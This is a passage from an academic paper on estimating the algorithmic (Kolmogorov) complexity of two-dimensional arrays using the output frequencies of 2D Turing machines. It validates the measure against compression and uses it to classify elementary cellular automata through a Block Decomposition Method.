m different instructions). The numbers corresponding to all entries in the transition table (irrespective of the convention followed in sorting them) form a number with nm digits in base 4nm + m. Then, the translation of a transition table to a natural number and vice versa can be done through elementary arithmetical operations. We take as output for a 2D Turing machine the minimal array that includes all cells visited by the machine. Note that this probably includes cells that have not been visited, but it is the more natural way of producing output with some regular format and at the same time reducing the set of different outputs. Figure 1 shows an example of the transition table of a Turing machine in (3,2)2D and its execution over a ‘0’-filled grid. We show the portion of the grid that is returned as the output array. Two of the six cells have not been visited by the machine. AN APPROXIMATION TO THE UNIVERSAL DISTRIBUTION We have run all machines in (4,2)2D just as we have done before for deterministic 1-dimensional Turing machines (Delahaye & Zenil, 2012; Soler-Toscano et al., 2014). That is, considering the output of all different machines starting both in a ‘0’-filled grid (all white) and in a ‘1’-filled (all black) grid. Symmetries are described and used in the same way than in Soler-Toscano et al. (2014) in order to avoid running a larger number of machines whose output can be predicted from other equivalent machines (by rotation, Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 6/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 Figure 1 Top: Example of a deterministic 2-dimensional Turing machine. Bottom: Accumulated runtime distribution for (4,2)2D. transposition, 1-complementation, reversion, etc.) that produce equivalent outputs with the same frequency. We also used a reduced enumeration to avoid running certain trivial machines whose behavior can be predicted from the transition table, as well as filters to detect non-halting machines before exhausting the entire runtime. In the reduced enumeration we considered only machines with an initial transition moving to the right and changing to a different state than the initial and halting states. Machines moving to the initial state at the starting transition run forever, and machines moving to the halting state produce single-character output. So we reduce the number of initial transitions in (n,m)2D to m(n − 1) (the machine can write any of the m symbols and change to any state in {2,...,n}). The set of different machines is reduced accordingly to k(n − 1)(4nm + m)nm−1. To enumerate these machines we construct a mixed-radix number, given that the digit corresponding to the initial transition now goes from 0 to m(n − 1) − 1. To the output obtained when running this reduced enumeration we add the single-character arrays that correspond to machines Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 7/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 moving to the initial state at the starting transition. These machines and their output can be easily quantified. Also, to take into account machines with the initial transition moving in a different direction than the right one, we consider the 90, 180 and 270 degree rotations of the strings produced, given that for any machine moving up (left/down) at the initial transition, there is another one moving right that produces the identical output but rotates −90 (−180/−270) degrees. Setting the runtime The Busy Beaver runtime value for (4,2) is 107 steps upon halting. But no equivalent Busy Beavers are known for 2-dimensional Turing machines (although variations of Turmite’s Busy Beaver functions have been proposed (Pegg, 2013)). So to set the runtime in our experiment we generated a sample of 334 × 108 random machines in the reduced enumeration. We used a runtime of 2,000 steps for the runtime sample, this is 10.6% of the machines in the reduced enumeration for (4,2)2D, but 1,500 steps for running all (4,2)2D. These machines were generated instruction by instruction. As we have explained above, it is possible to assign a natural number to every instruction. So to generate a random machine in the reduced enumeration for (n,m)2D we produce a random number from 0 to m(n − 1) − 1 for the initial transition and from 0 to 4nm + m − 1 for the other nm − 1 transitions. We used the implementation of the Mersenne Twister in the Boost C++ library. The output of this sample was the distribution of the runtime of the halting machines. Figure 1 shows the probability that a random halting machine will halt in at most the number of steps indicated on the horizontal axis. For 100 steps this probability is 0.9999995273. Note that the machines in the sample are in the reduced enumeration, a large number of very trivial machines halting in just one step having been removed. So in the complete enumeration the probability of halting in at most 100 steps is even greater. But we found some high runtime values—precisely 23 machines required more than 1,000 steps. The highest value was a machine progressing through 1,483 steps upon halting. So we have enough evidence to believe that by setting the runtime at 2,000 steps we have obtained almost all (if not all) output arrays. We ran all 6 × 347 Turing machines in the reduced enumeration for (4,2)2D. Then we applied the completions explained before. OUTPUT ANALYSIS The final output represents the result of 2(4nm + m)2 executions (all machines in (4,2)2D starting with both blank symbols ‘0’ and ‘1’). We found 3,079,179,980,224 non-halting machines and 492,407,829,568 halting machines. A number of 1,068,618 different binary arrays were produced after 12 days of calculation with a supercomputer of medium size (a 25×86-64 CPUs running at 2,128 MHz each with 4 GB of memory each, located at the Centro Informático Cientı́fico de Andalucı́a (CICA), Spain. Let D(4,2)2D be the set constructed by dividing the occurrences of each different array by the number of halting machines as a natural extension of Eq. (6) for 2-dimensional Turing machines. Then, for every string s, Km,2D(s) = −log2(D(4,2)(s)) (7) Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 8/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 Figure 2 The top 36 objects in D(4,2)2D preceded by their Km,2D values, sorted by higher to lower fre- quency and therefore from smaller to larger Kolmogorov complexity after application of the Coding theorem. Only non-symmetrical cases are displayed. The grid is only for illustration purposes. using the Coding theorem (Eq. (3)). Figure 2 shows the top 36 objects in D(4,2)2D, that is the objects with lowest Kolmogorov complexity values. Evaluating 2-dimensional Kolmogorov complexity D(4,2)2D denotes the frequency distribution (a calculated Universal Distribution) from the output of deterministic 2-dimensional Turing machines, with associated complexity measure Km,2D. D(4,2)2D distributes 1,068,618 arrays into 1,272 different complexity values, with a minimum complexity value of 2.22882 bits (an explanation of non-integer program-size complexity is given in Soler-Toscano et al. (2014) and Soler-Toscano et al. (2013)), a maximum value of 36.2561 bits and a mean of 35.1201. Considering the number of possible square binary arrays given by the formula 2d×d (without considering any symmetries), D(4,2)2D can be said to produce all square binary arrays of length up to 3 × 3, that is 3 d=1 2 d×d = 530 square arrays, and 60,016 of the 2(4×4) = 65,536 square arrays with side of length (or dimension) d = 4. It only produces 84,104 of the 33,554,432 Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 9/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 Figure 3 Top: Frequency of appearance of symmetric “checkerboard” patterns sorted from more to less frequent according to D(4,2)2D (displayed only non-symmetrical cases under rotation and complemen- tation). The checkerboard of size 4 × 4 doesn’t occur. However, all 3 × 3 as seen in Fig. 6, including the “checkerboard” pattern of size 3 × 3 do occur. Bottom: Symmetry breaking from a fully deterministic set of symmetric computational rules. Bottom Left: With a value of Km,2D = 6.7 this is the simplest 4 × 4 square array after the preceding all-blank 4 × 4 array (with Km,2D = 6.4) and before the 4 × 4 square array with a black cell in one of the array corners (with complexity Km,2D = 6.9). Bottom Right: The only and most complex square array (with 15 other symmetrical cases) in D(4,2)2D with Km,2D = 34.2561. Another way to see this array is as one among those of length 13 with low complexity given that it occurred once in the sampled distribution in the classification unlike all other square arrays of the same size that are missing in D(4,2)2D. possible square binary arrays of length d = 5 and only 11,328 of the possible 68,719,476,736 of dimension d = 6. The largest square array produced in D(4,2)2D is of side length d = 13 (Left of Fig. 3) out of a possible 748 × 1048; it has a Km,2D value equal to 34.2561. What one would expect from a distribution where simple patterns are more frequent (and therefore have lower Kolmogorov complexity after application of the Coding theorem) would be to see patterns of the “checkerboard” type with high frequency and low random complexity (K), and this is exactly what we found (see Fig. 3), while random looking patterns were found at the bottom among the least frequent ones (Fig. 4). Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 10/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 Figure 4 Symmetry breaking from fully deterministic symmetric computational rules. Bottom 16 objects in the classification with lowest frequency, or being most random according to D(4,2)2D. It is interesting to note the strong similarities given that similar-looking cases are not always exact symmetries. The arrays are preceded by the number of occurrences of production from all the (4,2)2D Turing machines. We have coined the informal notion of a “climber” as an object in the frequency classification (from greatest to lowest frequency) that appears better classified among objects of smaller size rather than with the arrays of their size, this is in order to highlight possible candidates for low complexity, hence illustrating how the process make low complexity patterns to emerge. For example, “checkerboard” patterns (see Fig. 3) seem to be natural “climbers” because they come significantly early (more frequent) in the classification than most of the square arrays of the same size. In fact, the larger the checkerboard array, the more of a climber it seems to be. This is in agreement with what we Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 11/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 Figure 5 Two “climbers” (and all their symmetric cases) found in D(4,2)2D. Symmetric objects have higher frequency and therefore lower Kolmogorov complexity. Nevertheless, a fully deterministic algo- rithmic process starting from completely symmetric rules produces a range of patterns of high complexity and low symmetry. have found in the case of strings (Zenil, 2011; Delahaye & Zenil, 2012; Soler-Toscano et al., 2014) where patterned objects emerge (e.g., (01)n, that is, the string 01 repeated n times), appearing relatively increasingly higher in the frequency classifications the larger n is, in agreement with the expectation that patterned objects should also have low Kolmogorov complexity. An attempt of a definition of a climber is a pattern P of size a × b with small complexity among all a × b patterns, such that there exists smaller patterns Q (say c × d, with cd < ab) such that Km(P) < Km(Q) < median(Km(all ab patterns)). For example, Fig. 5 shows arrays that come together among groups of much shorter arrays, thereby demonstrating, as expected from a measure of randomness, that array—or string—size is not what determines complexity (as we have shown before in Zenil (2011), Delahaye & Zenil (2012) and Soler-Toscano et al. (2014) for binary strings). The fact that square arrays may have low Kolmogorov complexity can be understood in several ways, some of which strengthen the intuition that square arrays should be less Kolmogorov random, such as for example, the fact that for square arrays one only needs the information of one of its dimensions to determine the other, either height or width. Figure 5 shows cases in which square arrays are significantly better classified towards the top than arrays of similar size. Indeed, 100% of the squares of size 2 × 2 are in the first fifth Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 12/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 (F1), as are the 3 × 3 arrays. Square arrays of 4 × 4 are distributed as follows when dividing (4,2)2D in 5 equal parts: 72.66%, 15.07%, 6.17359%, 2.52%, 3.56%. VALIDATION OF THE CODING THEOREM METHOD BY COMPRESSIBILITY One way to validate our method based on the Coding theorem (Eq. (3)) is to attempt to measure its departure from the compressibility approach. This cannot be done directly, for as we have explained, compression algorithms perform poorly on short strings, but we did find a way to partially circumvent this problem by selecting subsets of strings for which our Coding theorem method calculated a high or low complexity which were then used to generate a file of length long enough to be compressed. Comparison of Km and approaches based on compression It is also not uncommon to detect instabilities in the values retrieved by a compression algorithm for short strings, as explained in ‘Uncomputability and instability of K ’, strings which the compression algorithm may or may not compress. This is not a malfunction of a particular lossless compression algorithm (e.g., Deflate, used in most popular computer formats such as ZIP and PNG) or its implementation, but a commonly encountered problem when lossless compression algorithms attempt to compress short strings. When researchers have chosen to use compression algorithms for reasonably long strings, they have proven to be of great value, for example, for DNA false positive repeat sequence detection in genetic sequence analysis (Rivals et al., 1996), in distance measures and classification methods (Cilibrasi & Vitanyi, 2005), and in numerous other applications (Li & Vitányi, 2009). However, this effort has been hamstrung by the limitations of compression algorithms–currently the only method used to approximate the Kolmogorov complexity of a string–given that this measure is not computable. In this section we study the relation between Km and approaches to Kolmogorov complexity based on compression. We show that both approaches are consistent, that is, strings with higher Km value are less compressible than strings with lower values. This is as much validation of Km and our Coding theorem method as it is for the traditional lossless compression method as approximation techniques to Kolmogorov complexity. The Coding theorem method is, however, especially useful for short strings where losses compression algorithms fail, and the compression method is especially useful where the Coding theorem is too expensive to apply (long strings). Compressing strings of length 10–15 For this experiment we have selected the strings in D(5) with lengths ranging from 10 to 15. D(5) is the frequency distribution of strings produced by all 1-dimensional deterministic Turing machines as described in Soler-Toscano et al. (2014). Table 1 shows the number of D(5) strings with these lengths. Up to length 13 we have almost all possible strings. For length 14 we have a considerable number and for length 15 there are less than 50% of the 215 possible strings. The distribution of complexities is shown in Fig. 7. Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 13/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 Figure 6 Complete reduced set (non-symmetrical cases under reversion and complementation) of 3 × 3 patches in Km,2D sorted from lowest to greatest Kolmogorov complexity after application of the Coding theorem (Eq. (3)) to the output frequency of 2-D Turing machines. We denote this set by Km,2D3×3 . For example, the 2 glider configurations in the Game of Life (Gardner, 1970) come with high Kolmogorov complexity (with approximated values of 20.2261 and 20.5031). Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 14/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 Table 1 Number of strings of length 10–15 found in D(5). Length (l) Strings 10 1,024 11 2,048 12 4,094 13 8,056 14 13,068 15 14,634 As expected, the longer the strings, the greater their average complexity. The overlapping of strings with different lengths that have the same complexity correspond to climbers. The experiment consisted in creating files with strings of different Km-complexity but equal length (files with more complex (random) strings are expected to be less compressible than files with less complex (random) strings). This was done in the following way. For each l (10 ≤ l ≤ 15), we let S(l) denote the list of strings of length l, sorted by increasing Km complexity. For each S(l) we made a partition of 10 sets with the same number of consecutive strings. Let’s call these partitions P(l,p), 1 ≤ p ≤ 10. Then for each P(l,p) we have created 100 files, each with 100 random strings in P(l,p) in random order. We called these files F(l,p,f ), 1 ≤ f ≤ 100. Summarizing, we now have: • 6 different string lengths l, from 10 to 15, and for each length • 10 partitions (sorted by increasing complexity) of the strings with length l, and • 100 files with 100 random strings in each partition. This makes for a total of 6,000 different files. Each file contains 100 different binary strings, hence with length of 100 × l symbols. A crucial step is to replace the binary encoding of the files by a larger alphabet, retaining the internal structure of each string. If we compressed the files F(l,p,f ) by using binary encoding then the final size of the resulting compressed files would depend not only on the complexity of the separate strings but on the patterns that the compressor discovers along the whole file. To circumvent this we chose two different symbols to represent the ‘0’ and ‘1’ in each one of the 100 different strings in each file. The same set of 200 symbols was used for all files. We were interested in using the most standard symbols we possibly could, so we created all pairs of characters from ‘a’ to ‘p’ (256 different pairs) and from this set we selected 200 two-character symbols that were the same for all files. This way, though we do not completely avoid the possibility of the compressor finding patterns in whole files due to the repetition of the same single character in different strings, we considerably reduce the impact of this phenomenon. The files were compressed using the Mathematica function Compress, which is an implementation of the Deflate algorithm (Lempel–Ziv plus Huffman coding). Figure 7 shows the distributions of lengths of the compressed files for the different string lengths. The horizontal axis shows the 10 groups of files in increasing Km. As the complexity of the Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 15/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 Figure 7 Top: Distribution of complexity values for different string lengths (l). Bottom: Distribution of the compressed lengths of the files. Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 16/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 Figure 8 Scatterplot of Km with 2-dimensional Turing machines (Turmites) as a function of Km with 1-dimensional Turing machines. strings grows (right part of the diagrams), the compressed files are larger, so they are harder to compress. The relevant exception is length 15, but this is probably related to the low number of strings of that length that we have found, which are surely not the most complex strings of length 15. We have used other compressors such as GZIP (which uses Lempel–Ziv algorithm LZ77) and BZIP2 (Burrows–Wheeler block sorting text compression algorithm and Huffman coding), with several compression levels. The results are similar to those shown in Fig. 7. Comparing (4,2)2D and (4,2) We shall now look at how 1-dimensional arrays (hence strings) produced by 2D Turing machines correlate with strings that we have calculated before (Zenil, 2011; Delahaye & Zenil, 2012; Soler-Toscano et al., 2014) (denoted by D(5)). In a sense this is like changing the Turing machine formalism to see whether the new distribution resembles distributions following other Turing machine formalisms, and whether it is robust enough. All Turing machines in (4,2) are included in (4,2)2D because these are just the machines that do not move up or down. We first compared the values of the 1,832 output strings in (4,2) to the 1-dimensional arrays found in (4,2)2D. We are also interested in the relation between the ranks of these 1,832 strings in both (4,2) and (4,2)2D. Figure 8 shows the link between Km,2D with 2D Turing machines as a function of ordinary Km,1D (that is, simply Km as defined in Soler-Toscano et al. (2014)). It suggests a strong almost-linear overall association. The correlation coefficient r = 0.9982 confirms Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 17/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 Figure 9 Scatterplot of Km with 2-dimensional Turing machines as a function of Km with 1- dimensional Turing machines by length of strings, for strings of length 5–13. the linear association, and the Spearman correlation coefficient rs = 0.9998 proves a tight and increasing functional relation. The length l of strings is a possible confounding factor. However Fig. 9 suggests that the link between one and 2-dimensional complexities is not explainable by l. Indeed, the partial correlation rKm,1DKm,2D.l = 0.9936 still denotes a tight association. Figure 9 also suggests that complexities are more strongly linked with longer strings. This is in fact the case, as Table 2 shows: the strength of the link increases with the length of the resulting strings. One and 2-dimensional complexities are remarkably correlated and may be considered two measures of the same underlying feature of the strings. How these measures vary is another matter. The regression of Km,2D on Km,1D gives the following approximate relation: Km,2D ≈ 2.64 + 1.11Km,1D. Note that this subtle departure from identity may be a consequence of a slight non-linearity, a feature visible in Fig. 8. Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 18/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 Table 2 Correlation coefficients between one and 2-dimensional complexities by length of strings. Length (l) Correlation 5 0.9724 6 0.9863 7 0.9845 8 0.9944 9 0.9977 10 0.9952 11 1 12 1 Comparison of Km and compression of cellular automata A 1-dimensional CA can be represented by an array of cells xi where i ∈ Z (integer set) and each x takes a value from a finite alphabet Σ. Thus, a sequence of cells {xi} of finite length n describes a string or global configuration c on Σ. This way, the set of finite configurations will be expressed as Σn. An evolution comprises a sequence of configurations {ci} produced by the mapping Φ:Σn → Σn; thus the global relation is symbolized as: Φ(ct ) → ct+1 (8) where t represents time and every global state of c is defined by a sequence of cell states. The global relation is determined over the cell states in configuration ct updated simultaneously at the next configuration ct+1 by a local function ϕ as follows: ϕ(xti−r,...,x t i ,...,x t i+r) → x t+1 i . (9) Wolfram (2002) represents 1-dimensional cellular automata (CA) with two parameters (k,r) where k = |Σ| is the number of states, and r is the neighborhood radius. Hence this type of CA is defined by the parameters (2,1). There are Σn different neighborhoods (where n = 2r + 1) and kk n distinct evolution rules. The evolutions of these cellular automata usually have periodic boundary conditions. Wolfram calls this type of CA Elementary Cellular Automata (denoted simply by ECA) and there are exactly kk n = 256 rules of this type. They are considered the most simple cellular automata (and among the simplest computing programs) capable of great behavioral richness. 1-dimensional ECA can be visualized in 2-dimensional space–time diagrams where every row is an evolution in time of the ECA rule. By their simplicity and because we have a good understanding about them (e.g., at least one ECA is known to be capable of Turing universality (Cook, 2004; Wolfram, 2002)) they are excellent candidates to test our measure Km,2D, being just as effective as other methods that approach ECA using compression algorithms (Zenil, 2010) that have yielded the results that Wolfram obtained heuristically. Km,2D comparison with compressed ECA evolutions We have seen that our Coding theorem method with associated measure Km (or Km,2D in this paper for 2D Kolmogorov complexity) is in agreement with bit string complexity as Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 19/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 approached by compressibility, as we have reported in ‘Comparison of Km and approaches based on compression’. The Universal Distribution from Turing machines that we have calculated (D(4,2)2D) will help us to classify Elementary Cellular Automata. Classification of ECA by compress- ibility has been done before in Zenil (2010) with results that are in complete agreement with our intuition and knowledge of the complexity of certain ECA rules (and related to Wolfram’s (2002) classification). In Zenil (2010) both classifications by simplest initial condition and random initial condition were undertaken, leading to a stable compress- ibility classification of ECAs. Here we followed the same procedure for both simplest initial condition (single black cell) and random initial condition in order to compare the classification to the one that can be approximated by using D(4,2)2D, as follows. We will say that the space–time diagram (or evolution) of an Elementary Cellular Automaton c after time t has complexity: Km,2Dd×d (c t ) =  q∈{ct }d×d Km,2D(q). (10) That is, the complexity of a cellular automaton c is the sum of the complexities of the q arrays or image patches in the partition matrix {ct }d×d from breaking {c t } into square arrays of length d produced by the ECA after t steps. An example of a partition matrix of an ECA evolution is shown in Fig. 13 for ECA Rule 30 and d = 3 where t = 6. Notice that the boundary conditions for a partition matrix may require the addition of at most d − 1 empty rows or d − 1 empty columns to the boundary as shown in Fig. 13 (or alternatively the dismissal of at most d − 1 rows or d − 1 columns) if the dimensions (height and width) are not multiples of d, in this case d = 3. If the classification of all rules in ECA by Km,2D yields the same classification obtained by compressibility, one would be persuaded that Km,2D is a good alternative to compressibility as a method for approximating the Kolmogorov complexity of objects, with the signal advantage that Km,2D can be applied to very short strings and very short arrays such as images. Because all possible 29 arrays of size 3 × 3 are present in Km,2D we can use this arrays set to try to classify all ECAs by Kolmogorov complexity using the Coding Theorem method. Figure 6 shows all relevant (non-symmetric) arrays. We denote by Km,2D3×3 this subset from Km,2D. Figure 11 displays the scatterplot of compression complexity against Km,2D3×3 calculated for every cellular automaton. It shows a positive link between the two measures. The Pearson correlation amounts to r = 0.8278, so the determination coefficient is r2 = 0.6853. These values correspond to a strong correlation, although smaller than the correlation between 1- and 2-dimensional complexities calculated in ‘Comparison of Km and approaches based on compression’. Concerning orders arising from these measures of complexity, they too are strongly linked, with a Spearman correlation of rs = 0.9200. The scatterplots (Fig. 11) show a strong agreement between the Coding theorem method and the traditional compression method when both are used to classify ECAs by their approximation to Kolmogorov complexity. Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 20/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 Figure 10 All the first 128 ECAs (the other 128 are 0–1 reverted rules) starting from the simplest (black cell) initial configuration running for t = 36 steps, sorted from lowest to highest complexity according to Km,2D3×3 . Notice that the same procedure can be extended for its use on arbitrary images. Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 21/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 Figure 11 Scatterplots of Compress versus Km,2D3×3 on the 128 first ECA evolutions after t = 90 steps. Top: Distribution of points along the axes displaying clusters of equivalent rules and a distribution corresponding to the known complexity of various cases. Bottom: Same plot but with some ECA rules highlighted some of which were used in the side by side comparison in Fig. 13 (but unlike there, here for a single black cell initial condition). That rules distribute on the diagonal indicates that both methods are correlated as theoretically expected (even if lossless compression is a form of entropy rate up to the compression fixed maximum word length). Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 22/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 The anomalies found in the classification of Elementary Cellular Automata (e.g., Rule 77 being placed among ECA with high complexity according to Km,2D3×3 ) is a limitation of Km,2D3×3 itself and not of the Coding theorem method which for d = 3 is unable to “see” beyond 3-bit squares using, which is obviously very limited. And yet the degree of agreement with compressibility is surprising (as well as with intuition, as a glance at Fig. 10 shows, and as the distribution of ECAs starting from random initial conditions in Fig. 13 confirms). In fact an average ECA has a complexity of about 20K bits, which is quite a large program-size when compared to what we intuitively gauge to be the complexity of each ECA, which may suggest that they should have smaller programs. However, one can think of D(4,2)2D3×3 as attempting to reconstruct the evolution of each ECA for the given number of steps with square arrays only 3 bits in size, the complexity of the three square arrays adding up to approximate Km,2D of the ECA rule. Hence it is the deployment of D(4,2)2D3×3 that takes between 500 to 50K bits to reconstruct every ECA space–time evolution depending on how random versus how simple it is. Other ways to exploit the data from D(4,2)2D (e.g., non-square arrays) can be utilized to explore better classifications. We think that constructing a Universal Distribution from a larger set of Turing machines, e.g., D(5,2)2D4×4 will deliver more accurate results but here we will also introduce a tweak to the definition of the complexity of the evolution of a cellular automaton. Splitting ECA rules in array squares of size 3 is like trying to look through little windows 9 pixels wide one at a time in order to recognize a face, or training a “microscope” on a planet in the sky. One can do better with the Coding theorem method by going further than we have in the calculation of a 2-dimensional Universal Distribution (e.g., calculating in full or a sample of D(5,2)2D4×4 ), but eventually how far this process can be taken is dictated by the computational resources at hand. Nevertheless, one should use a telescope where telescopes are needed and a microscope where microscopes are needed. Block Decomposition Method One can think of an improvement in resolution of Km,2D(c) for growing space–time diagrams of cellular automaton by taking the log2(n) of the sum of the arrays where n is the number of repeated arrays, instead of simply adding the complexity of the image patches or arrays. That is, one penalizes repetition to improve the resolution of Km,2D for larger images as a sort of “optical lens”. This is possible because we know that the Kolmogorov complexity of repeated objects grows by log2(n), just as we explained with an example in ‘Kolmogorov–Chaitin Complexity’. Adding the complexity approximation of each array in the partition matrix of a space–time diagram of an ECA provides an upper bound on the ECA Kolmogorov complexity, as it shows that there is a program that generates the ECA evolution picture with the length equal to the sum of the programs generating all the sub-arrays (plus a small value corresponding to the code length to join the sub-arrays). So if a sub-array occurs n times we do not need to consider its complexity n times but log2(n). Taking into account this, Eq. (10) can be then rewritten as: K′m,2Dd×d (c t ) =  (ru,nu)∈{ct }d×d Km(ru) + log2(nu) (11) Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 23/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 where ru are the different square arrays in the partition {c t }d×d of the matrix c t and nu the multiplicity of ru, that is the number of repetitions of d × d-length patches or square arrays found in ct . From now on we will use K′ for squares of size greater than 3 and it may be denoted only by K or by BDM standing for Block decomposition method. BDM has now been applied successfully to measure, for example, the Kolmogorov complexity of graphs and complex networks (Zenil et al., 2014) by way of their adjacency matrices (a 2D grid) and was shown to be consistent with labelled and unlabelled (up to isomorphisms) graphs. Now complexity values of K′m,2Dd×d range between 70 and 3K bits with a mean program-size value of about 1K bits. The classification of ECA, according to Eq. (11), is presented in Fig. 12. There is an almost perfect agreement with a classification by lossless compression length (see Fig. 13) which makes even one wonder whether the Coding theorem method is actually providing more accurate approximations to Kolmogorov complexity than lossless compressibility for this objects length. Notice that the same procedure can be extended for its use on arbitrary images. We denominate this technique Block Decomposition Method. We think it will prove to be useful in various areas, including machine learning as an of Kolmogorov complexity (other contributions to ML inspired in Kolmogorov complexity can be found in Hutter (2003)). Also worth notice that the fact that ECA can be successfully classified by Km,2D with an approximation of the Universal Distribution calculated from Turing machines (TM) suggests that output frequency distributions of ECA and TM cannot be but strongly correlated, something that we had found and reported before in Zenil & Delahaye (2010) and Delahaye & Zenil (2007b). Another variation of the same Km,2D measure is to divide the original image into all possible square arrays of a given length rather than taking a partition. This would, however, be exponentially more expensive than the partition process alone, and given the results in Fig. 12 further variations do not seem to be needed, at least not for this case. Robustness of the approximations to m(s) One important question that arises when positing the soundness of the Coding theorem method as an alternative to having to pick a universal Turing machine to evaluate the Kolmogorov complexity K of an object, is how many arbitrary choices are made in the process of following one or another method and how important they are. One of the motivations of the Coding theorem method is to deal with the constant involved in the Invariance theorem (Eq. (2)), which depends on the (prefix-free) universal Turing machine chosen to measure K and which has such an impact on real-world applications involving short strings. While the constant involved remains, given that after application of the Coding theorem (Eq. (3)) we reintroduce the constant in the calculation of K , a legitimate question to ask is what difference it makes to follow the Coding theorem method compared to simply picking the universal Turing machine. On the one hand, one has to bear in mind that no other method existed for approx- imating the Kolmogorov complexity of short strings. On the other hand, we have tried to minimize any arbitrary choice, from the formalism of the computing model to the Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 24/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 Figure 12 Block Decomposition Method. All the first 128 ECAs (the other 128 are 0–1 reverted rules) starting from the simplest (black cell) initial configuration running for t = 36 steps, sorted from lowest to highest complexity according to Klog as defined in Eq. (11). Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 25/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 Figure 13 Top: Block decomposing (other boundary conditions are possible and under investigation) the evolution of Rule 30 (top) ECA after t = 6 steps into 10 subarrays of length 3 × 3 (bottom) in order to calculate Km,2D3×3 to approximate its Kolmogorov complexity. Bottom: Side by side comparison of 8 evolutions of representative ECAs, starting from a random initial configuration, sorted from lowest to highest BDM values (top) and smallest to largest compression lengths using the Deflate algorithm as a method to approximate Kolmogorov complexity (Zenil, 2010). Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 26/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 informed runtime, when no Busy Beaver values are known and therefore sampling the space using an educated runtime cut-off is called for. When no Busy Beaver values are known the chosen runtime is determined according to the number of machines that we are ready to miss (e.g., less than .01%) for our sample to be significative enough as described in ‘Setting the runtime’. We have also shown in Soler-Toscano et al. (2014) that approximations to the Universal Distribution from spaces for which Busy Beaver values are known are in agreement with larger spaces for which Busy Beaver values are not known. Among the possible arbitrary choices it is the enumeration that may perhaps be questioned, that is, calculating D(n) for increasing n (number of Turing machine states), hence by increasing size of computer programs (Turing machines). On the one hand, one way to avoid having to make a decision on the machines to consider when calculating a Universal Distribution is to cover all of them for a given number of n states and m symbols, which is what we have done (hence the enumeration in a thoroughly (n,m) space becomes irrelevant). While it may be an arbitrary choice to fix n and m, the formalisms we have followed guarantee that n-state m-symbol Turing machines are in (n + i,m + j) with i,j ≥ 0 (that is, the space of all n + i-state m + j-symbol Turing machines). Hence the process is incremental, taking larger spaces and constructing an average Universal Distribution. In fact, we have demonstrated (Soler-Toscano et al., 2014) that D(5) (that is, the Universal Distribution produced by the Turing machines with 2 symbols and 5 states) is strongly correlated to D(4) and represents an improvement in accuracy of the string complexity values in D(4), which in turn is in agreement with and an improvement on D(3) and so on. We have also estimated the constant c involved in the invariance theorem (Eq. (2)) between these D(n) for n > 2, which turned out to be very small in comparison to all the other calculated Universal Distributions (Soler-Toscano et al., 2013). Real-world evidence We have provided here some theoretical and statistical arguments to show the reliability, validity and generality of our measure, more empirical evidence has also been produced, in particular in the field of cognition and psychology where researchers often have to deal with too short strings or too small patterns for compression methods to be used. For instance, it was found that the complexity of a (one-dimensional) string better predicts its recall from short-term memory that the length of the string (Chekaf et al., 2015). Incidentally, a study on the conspiracy theory believers mindset also revealed that human perception of randomness is highly linked to our one-dimensional measure of complex- ity (Dieguez, Wagner-Egger & Gauvrit, 2015). Concerning the two-dimensional version introduced in this paper, it has been fruitfully used to show how language iterative learning triggers the emergence of linguistic structures (Kempe, Gauvrit & Forsyth, 2015). A direct link between the perception of two-dimensional randomness, our complexity measure, and natural statistics was also established in two experiments (Gauvrit, Soler-Toscano & Zenil, 2014). These findings further support the complexity metrics presented herein. Furthermore, more theoretical arguments have been advanced in Soler-Toscano et 